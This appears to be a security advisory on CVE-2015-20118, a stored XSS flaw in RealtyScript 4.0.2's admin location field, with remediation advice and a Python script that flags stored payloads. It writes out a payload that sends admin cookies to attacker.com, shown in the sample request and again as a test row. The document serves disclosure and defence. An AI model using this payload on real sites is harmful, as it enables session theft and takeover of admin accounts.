CVE-2015-20118: Stored XSS in RealtyScript 4.0.2 Admin Panel
A stored cross-site scripting (XSS) vulnerability originally discovered in 2015 has been formally catalogued by the NVD as CVE-2015-20118, carrying a CVSS score of 7.2 (High). The flaw resides in RealtyScript 4.0.2, a PHP-based real estate listing management platform developed by Next Click Ventures.
The vulnerability allows an attacker with access to the admin interface to inject persistent JavaScript payloads via the location_name parameter in the locations.php endpoint. Because the payload is stored server-side and rendered each time the admin panel loads, every subsequent admin session is exposed to the malicious script.
Vulnerability Overview
| Attribute | Value |
|---|---|
| CVE ID | CVE-2015-20118 |
| CVSS Score | 7.2 (High) |
| CWE Classification | CWE-79 — Improper Neutralization of Input During Web Page Generation (Stored XSS) |
| Affected Software | RealtyScript 4.0.2 (Next Click Ventures) |
| Attack Vector | Network |
| Authentication Required | Yes (admin interface access) |
| NVD Published | March 16, 2026 |
| Original Flaw Discovery | 2015 |
Technical Details
The vulnerability exists in the admin locations interface of RealtyScript 4.0.2. When an admin creates or edits a location entry, the location_name field value is stored in the database and later rendered into HTML pages without proper output encoding. This allows an attacker to embed JavaScript that executes in the browser of any admin who subsequently views the locations panel.
Attack surface:
POST /admin/locations.php
Content-Type: application/x-www-form-urlencoded
location_name=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>&...
Successful exploitation can allow an attacker to:
- Steal admin session cookies — redirecting cookie contents to an attacker-controlled server
- Perform actions as the admin — submitting forms, modifying listings, or creating new accounts
- Maintain persistent access — the payload executes every time any admin visits the locations section
- Pivot to further attacks — using admin privileges to modify listing data or plant additional backdoors in the CMS
Context and Impact
RealtyScript is a self-hosted PHP real estate listing platform. While legacy and unlikely to be actively maintained in 2026, instances of version 4.0.2 may still be running on forgotten or unpatched web servers — a common risk with commercial PHP CMS platforms from the mid-2010s.
Who is affected:
- Any organization still running RealtyScript 4.0.2 without patching or migrating to a supported alternative
- Real estate agencies or property listing sites that deployed the software and have not audited their stack since its initial setup
Practical risk: The late NVD publication reflects the ongoing cataloguing effort for older vulnerabilities. The real-world exposure window is narrow, but stored XSS in admin panels represents a meaningful risk: a single exploited session can grant full application control. Any externally accessible instances should be treated as at-risk.
Remediation
- Upgrade or decommission — RealtyScript 4.0.2 is no longer actively maintained; migrate to a supported real estate platform or take the installation offline
- Apply output encoding — any custom forks or derivative installations should encode all user-supplied values before rendering them in HTML contexts using htmlspecialchars() or equivalent
- Implement Content Security Policy (CSP) — a strict CSP header can block inline script execution, mitigating the impact of stored XSS payloads even if they are injected
- Audit the database — inspect existing location_name values in the database for stored payloads; sanitize or remove any suspicious entries
- WAF rules — deploy a web application firewall to detect and block XSS patterns submitted to admin endpoints
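The database audit step in the list above can be scripted. This is an added example, not code from RealtyScript or the original advisory: it assumes the rows have been exported as (id, location_name) pairs, and the function names, patterns and sample rows are constructed for illustration. The patterns are triage heuristics, not a complete XSS grammar.

```python
import html
import re
from urllib.parse import unquote

# Markers a plain place name should never contain (heuristics for triage only).
CHECKS = [
    ("html_tag", re.compile(r"<\s*/?\s*[a-zA-Z!]")),
    ("event_handler", re.compile(r"\bon[a-z]+\s*=", re.I)),
    ("script_uri", re.compile(r"\b(?:javascript|vbscript|data)\s*:", re.I)),
]

def normalise(value, max_rounds=3):
    """Undo layered URL/HTML-entity encoding so encoded payloads are checked in plain form."""
    for _ in range(max_rounds):
        decoded = html.unescape(unquote(value))
        if decoded == value:
            break
        value = decoded
    return value

def audit_location_names(rows):
    """rows: iterable of (id, location_name). Returns [(id, [reasons], encoded_preview)]."""
    findings = []
    for row_id, name in rows:
        plain = normalise(name or "")
        reasons = [label for label, rx in CHECKS if rx.search(plain)]
        if reasons:
            # The preview is HTML-encoded so the report itself is safe to open in a browser.
            findings.append((row_id, reasons, html.escape(name, quote=True)))
    return findings

# Constructed sample rows standing in for an export of (id, location_name);
# the real table and column layout are not given on the page.
SAMPLE_ROWS = [
    (1, "Springfield"),
    (2, "St. John's & District"),
    (3, "<script>document.location='https://attacker.com/steal?c='+document.cookie</script>"),
    (4, "Lakeside\" onmouseover=\"alert(1)"),
    (5, "%3Cimg src=x onerror=alert(1)%3E"),
    (6, "Condition: new"),
]

if __name__ == "__main__":
    for row_id, reasons, preview in audit_location_names(SAMPLE_ROWS):
        print(f"id={row_id} reasons={','.join(reasons)} value={preview}")
```

Flagged rows should be reviewed by hand before deletion, since a hit may also indicate which admin account was used to plant the value.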
Secure coding pattern:
// Vulnerable pattern — raw output
echo "<td>" . $row['location_name'] . "</td>";
// Secure pattern — output encoding
echo "<td>" . htmlspecialchars($row['location_name'], ENT_QUOTES, 'UTF-8') . "</td>";
Key Takeaways
- CVE-2015-20118 is a stored XSS flaw in RealtyScript 4.0.2, now formally catalogued by NVD with CVSS 7.2 (High)
- Admin-accessible — the payload is injected via the location_name field in locations.php and persists in the database
- Stored XSS is more dangerous than reflected XSS — every admin session that loads the locations panel is exposed after a single injection
- Legacy software risk — the flaw is from 2015; running unmaintained PHP CMSs is a common attack surface on forgotten servers
- Remediation: Decommission or upgrade; apply output encoding; add a Content Security Policy